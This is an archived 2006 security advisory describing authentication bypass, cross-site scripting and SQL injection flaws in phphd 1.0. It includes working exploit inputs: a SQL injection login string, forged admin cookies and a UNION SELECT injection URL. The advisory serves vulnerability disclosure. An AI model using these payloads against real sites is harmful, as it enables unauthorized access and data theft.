EV0060.txt

EV0060.txt: Posted Feb 14, 2006; Authored by Aliaksandr Hartsuyeu | Site evuln.com; phphd version 1.0 is susceptible to authentication bypass, SQL injection, and cross site scripting attacks.; tags | exploit, xss, sql injection; advisories | CVE-2006-0607, CVE-2006-0608, CVE-2006-0609; SHA-256 | dd4245be5d5106d9c2af9125bdb87d0380607c39a5d75335623e00673c77c321; Download | Favorite | View

EV0060.txt

New eVuln Advisory:
phphd Multiple Vulnerabilities
http://evuln.com/vulns/60/summary.html

--------------------Summary----------------
eVuln ID: EV0060
CVE: CVE-2006-0607 CVE-2006-0608 CVE-2006-0609
Vendor: Hinton Design
Vendor's Web Site: http://www.hintondesign.org
Software: phphd
Sowtware's Web Site: http://www.hintondesign.org/downloads/view_cat.php?cat_id=91
Versions: 1.0
Critical Level: Moderate
Type: Multiple Vulnerabilities
Class: Remote
Status: Unpatched. No reply from developer(s)
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

-----------------Description---------------
1. Authentication Bypass
Vulnerable script: check.php

There are two ways to bypass authentication:

a) SQL Injection
Variable $HTTP_POST_VARS[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

b) Cookie based authentication
check.php script dont make password comparisson when identifying user by cookies


2. Multiple Cross-Site Scripting
Vulnerable script: add.php
Most of user-defined data isn't properly sanitized. This can be used to post arbitrary html or script code.


3. Multiple SQL Injections
Vulnerable scripts: all scripts showing some data from database
Most of user-defined data isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off

--------------Exploit----------------------
Available at: http://evuln.com/vulns/60/exploit.html


1. Authentication Bypass

a) SQL Injection
url: http://host/ht/login.php
Username: ' or 1/*
Password: any

b) Cookie based authentication
Cookie: loged=yes
Cookie: username=admin
Cookie: user_level=1
Cookie: userid=1
Cookie: email=aaa@aaa.com


2. Cross-Site Scripting Example.
Url: http://host/phphd/add.php
Download_name: <XSS>
Version: <XSS>
Download Description: <XSS>



3. SQL Injection Example:
http://host/phphd/view_link.php? file_id=99'% 20union%20select% 201,2,3,4,5, 6,7,8,9,10, 11,12,13,14, 15/*

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Top Authors In Last 30 Days

Red Hat 267 files
indoushka 169 files
Jay Turla 150 files
Ubuntu 71 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 24 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,591)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,312)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,885)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,861)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

EV0060.txt

EV0060.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

EV0060.txt

Share This

EV0060.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems